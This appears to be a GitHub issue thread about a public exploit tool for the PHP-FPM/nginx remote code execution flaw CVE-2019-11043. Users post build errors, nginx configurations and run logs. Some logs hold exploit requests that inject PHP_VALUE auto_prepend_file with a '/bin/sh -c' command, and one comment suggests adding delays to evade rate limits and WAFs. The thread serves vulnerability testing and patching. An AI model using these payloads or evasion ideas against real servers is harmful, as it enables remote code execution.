Just a technical question, our servers are updated :)
We use a splitted enviroment where nginx runs in one container, php-fpm in another. I tried to reproduce the issue with your exploit, but it seems to hang at

2019/11/05 21:30:58 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]

while the project runs localy (8mins now). As i inspect your docker-file, you seem to have your enviroment combined in the same container. If the split we did protected us from the attack anyway, this would be a nice side-info :)

Also, if this is really the case, it would be may a idea to add it to the requirements?

Thanks for developing this poc!

when run the exp, fpm shows

error: Passing INI directive through FastCGI: unable to set 'session.auto_start'

whats wrong with that?

go run main.go

command-line-arguments

.\main.go:22:19: undefined: AttackParams
.\main.go:31:13: undefined: Methods
.\main.go:36:22: undefined: NewRequester
.\main.go:51:15: undefined: SetSetting
.\main.go:70:15: undefined: KillWorkers
.\main.go:84:19: undefined: Detect
.\main.go:86:16: undefined: errPisosBruteForbidden
.\main.go:105:14: undefined: Attack

Ho to run you sh*t?
I can't check any PHP file. Always base status code is 404.

Waste my time.

PHP 7.0.10 (cli) (built: Jun 25 2019 16:55:30) ( NTS )
nginx version: nginx/1.16.0

server {
listen 8080;
root /var/www/test;

location ~ [^/].php(/|$) {
fastcgi_split_path_info ^(.+?.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;

fastcgi_pass   127.0.0.1:9000;
fastcgi_index  index.php;

}
}

but, when i run ./phuip-fpizdam "http://127.0.0.1:8080/index.php"
result:
2019/10/29 14:59:44 Base status code is 200
2019/10/29 14:59:44 Detect() returned error: no qsl candidates found, invulnerable or something wrong

Using the following command

$: go get github.com/neex/phuip-fpizdam

I get the following error

go/src/github.com/neex/phuip-fpizdam/requester.go:31: undefined: http.ErrUseLastResponse

go version go1.6.2 linux/amd64

Ubuntu 16.04.5 LTS

$ go get github.com/neex/phuip-fpizdam

github.com/neex/phuip-fpizdam

go/src/github.com/neex/phuip-fpizdam/requester.go:30: undefined: http.ErrUseLastResponse

Hi,

I've been trying to use your PoC against an Nginx vhost that contains this snippet:

  location ^~ /foobar {
    alias /var/www/foobar;
    location ~ ^(?<prefix>/foobar)(?<phpfile>.+?\.php)(?<pathinfo>/.*)?$ {
      fastcgi_split_path_info ^(.+?\.php)(/.+)$;
      fastcgi_pass             127.0.0.1:9000;
      fastcgi_index index.php;
      include /etc/nginx/fastcgi_params;
      fastcgi_param SCRIPT_FILENAME $document_root$phpfile;
      fastcgi_param PATH_INFO $pathinfo if_not_empty;
    }
  }

I can't seem to reproduce it hitting http://example.com/foobar/index.php or http://example.com/foobar/module.php/modules/index.php (there are PHP files in both these locations). All my attempts yield an Nginx 404. There is no try_files within this location block.

Would you agree that the above is somehow not exploitable? I am not sure why, wondering if it's because of the use of the $pathinfo if_not_empty instead of $fastcgi_path_info, or perhaps it's the location regex?

P.S the /etc/nginx/fastcgi_params that gets included, looks like this. Note there is a PATH_INFO in there too but I think it gets overwritten by the subsequent fastcgi_param PATH_INFO $pathinfo if_not_empty in the location block?

fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;

fastcgi_param  SCRIPT_NAME        $fastcgi_script_name;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;

fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx/$nginx_version;

fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;

fastcgi_param  HTTPS              $https if_not_empty;

fastcgi_param  HTTP_PROXY         "";

fastcgi_param  PATH_INFO          $fastcgi_path_info;

# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param  REDIRECT_STATUS    200;

Thanks!

Is this good or bad?

Base status code is 404
Detect() returned error: no qsl candidates found, invulnerable or something wrong

phuip-fpizdam/requester.go

		cl: &http.Client{
			Transport: &http.Transport{
				DisableCompression: true,      // No "Accept-Encoding"
				TLSNextProto:       nextProto, // No http2
				Proxy:              http.ProxyFromEnvironment,
				TLSClientConfig:    &tls.Config{InsecureSkipVerify: true},
			},
			Timeout:       30 * time.Second,
			CheckRedirect: disableRedirects, // No redirects
		},

maybe you can add TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
Otherwise, it will appear Q: x509: cannot validate certificate for x.x.x.x because it doesn't contain any IP SANs

Inquiring Romanian speakers want to know...

The fastcgi_split_path_info directive must be there ...

It doesn't need to be there, as if it's not there and fastcgi_param PATH_INFO is set to an empty string, the same condition is met.

When executing go install github.com/neex/phuip-fpizdam, following error is printed:

$ go install github.com/neex/phuip-fpizdam
can't load package: package github.com/neex/phuip-fpizdam: cannot find package "github.com/neex/phuip-fpizdam" in any of:
	/usr/lib/go/src/github.com/neex/phuip-fpizdam (from $GOROOT)
	/home/invidian/go/src/github.com/neex/phuip-fpizdam (from $GOPATH)
$ go version
go version go1.13.3 linux/amd64

After the attack paras were found exploit freezes and aborts if the connection is interrupted

2019/10/25 11:02:48 Using attack params --qsl 1740 --pisos 7 --skip-detect
2019/10/25 11:02:48 Performing attack using php.ini settings...
2019/10/26 10:24:16 Attack returned error: Get https://server.tld/index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;?a=/bin/sh+-c+'which+which'&QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: net/http: request canceled (Client.Timeout exceeded while awaiting headers)

The flag will redirect the messages from the default stdin/out to logfile. This would give you the flexibility to review all messages at a later time. (use case example: large scan at night).

I have this implemented in my fork you can use as the quick reference. Just my 2 cents. Thank you.

https://github.com/yangsec888/phuip-fpizdam/blob/master/main.go

Hi !

Thanks for this usefull work.

I built a docker image to easily check URLs for vulnerability :

• https://github.com/ypereirareis/docker-CVE-2019-11043
• https://hub.docker.com/r/ypereirareis/cve-2019-11043

If you consider it useful, feel free to add it to your documentation.

Thanks.

If fastcgi_param PATH_INFO $fastcgi_path_info; is set before fastcgi_param REQUEST_URI $request_uri; the exploit no longer finds qsl candidates.
To test it, just comment the line fastcgi_param REQUEST_URI $request_uri; from /etc/nginx/fastcgi_params and add it after PATH_INFO in /etc/nginx/sites-enabled/default:

        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO       $fastcgi_path_info;
        fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
	fastcgi_param  REQUEST_URI        $request_uri;

go install github.com/neex/phuip-fpizdam
# github.com/neex/phuip-fpizdam
/home/golang/src/github.com/neex/phuip-fpizdam/main.go:47:23: constant 4294967296 overflows int

go version go1.13.3 linux/amd64

Hi,

Thank you for sharing the vulnerability! I have a quick yes-or-no question.

1. It includes something like try_files $uri =404 into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). source

2. No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch. source

My config, copied from the default Ubuntu one, contains these lines:

# regex to split $uri to $fastcgi_script_name and $fastcgi_path
fastcgi_split_path_info ^(.+\.php)(/.+)$;

# Check that the PHP script exists before passing it
try_files $fastcgi_script_name =404;

# Bypass the fact that try_files resets $fastcgi_path_info
# see: http://trac.nginx.org/nginx/ticket/321
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;

So right after it performs the try_files check, it restores the PATH_INFO - does that make it vulnerable again?

Adding an option to configure a delay for the HTTP requests so it can evade rate limits or certain WAFs.

Seems like the SCRIPT_FILENAME also has to be filled from the split info. If the SCRIPT_FILENAME is pointing to a fixed file the exploit is not working.

E.g.:

fastcgi_param SCRIPT_FILENAME $document_root/script.php

Used for example in FaaS installs. Also the reproducer is not reliable building a vulnerable container. Would be better to point to a vulnerable tag

• Run as bellow:

.\phuip-fpizdam.exe http://api-local.test.com/index.php

• Get message:

2019/10/24 15:55:51 Base status code is 200
2019/10/24 15:55:52 Detect() returned error: no qsl candidates found, invulnerable or something wrong

Currently, our exploit works only when Nginx config is like this:

location ~ [^/]\.php(/|$) {
   ...
}

I believe that far more popular config snippet is like this:

location ~ \.php$ {
   ...
}

which allows only URLs that end with .php (and not just contain .php/ somewhere).

Given location ~ \.php$, there're two further config options:

1. It includes something like try_files $uri =404 into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). However, this requires php-fpm and Nginx to share their FS, and I believe many DevOps consider this not modern enough.
2. The config doesn't have any further restrictions; it passes to php-fpm all URLs that end on .php. We can win in this case as fastcgi_split_path_info is still probably here (and it doesn't matter which regexp it uses).

However, to improve our exploit for case 2, we need even shorter php.ini options. We have 23 bytes currently and after adding ;.php to every string we have only 18 left. So there's a research field.

I'm testing this exploit on one of my websites and I am getting those errors.
Can someone explain what are those Or is this website is vulnerable to this attack?

TEST 1

Test site Url 1 https://www.mysite.com/watch_video.php?key=qwsr7d62679z185r0

2019/10/29 16:30:06 Detect() returned error: error while doing first request: Get https://www.mysite.com/watch_video.php/path%0Ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF

TEST 2

Test site Url 2 https://www.mysite.com/watch_video.php (without key param)

2019/10/29 16:29:41 Base status code is 200 2019/10/29 16:29:43 Detect() returned error: error for &main.AttackParams{QueryStringLength:1580, PisosLength:1}: Get https://www.mysite.com/watch_video.php/PHP%0Ais_the_shittiest_lang.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF